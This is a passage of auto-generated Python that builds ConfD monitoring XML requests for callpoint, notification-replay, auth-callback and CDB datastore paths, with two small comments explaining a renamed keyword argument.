internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
error = ET.SubElement(typepoint, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name = ET.SubElement(notification_stream_replay, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_replay_support(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
replay_support = ET.SubElement(notification_stream_replay, "replay-support")
replay_support.text = kwargs.pop('replay_support')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
# The stream list key already consumed kwargs['name'] above, so the
# generated pop of 'name' here always raised KeyError. Accept the
# daemon's name under the distinct keyword 'daemon_name' (assumed name).
name.text = kwargs.pop('daemon_name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
# NOTE: 'name' was already consumed above as the notification-stream-replay list
# key, so popping it again would raise KeyError; a distinct 'daemon_name' kwarg
# is assumed here for the daemon's name leaf.
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('daemon_name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
error = ET.SubElement(notification_stream_replay, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_enabled(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
enabled = ET.SubElement(authentication_callback, "enabled")
enabled.text = kwargs.pop('enabled')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
error = ET.SubElement(authentication_callback, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_enabled(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
enabled = ET.SubElement(authorization_callbacks, "enabled")
enabled.text = kwargs.pop('enabled')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
error = ET.SubElement(authorization_callbacks, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name = ET.SubElement(datastore, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_transaction_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
transaction_id = ET.SubElement(datastore, "transaction-id")
transaction_id.text = kwargs.pop('transaction_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_write_queue(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
write_queue = ET.SubElement(datastore, "write-queue")
write_queue.text = kwargs.pop('write_queue')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_filename(self, **kwargs):
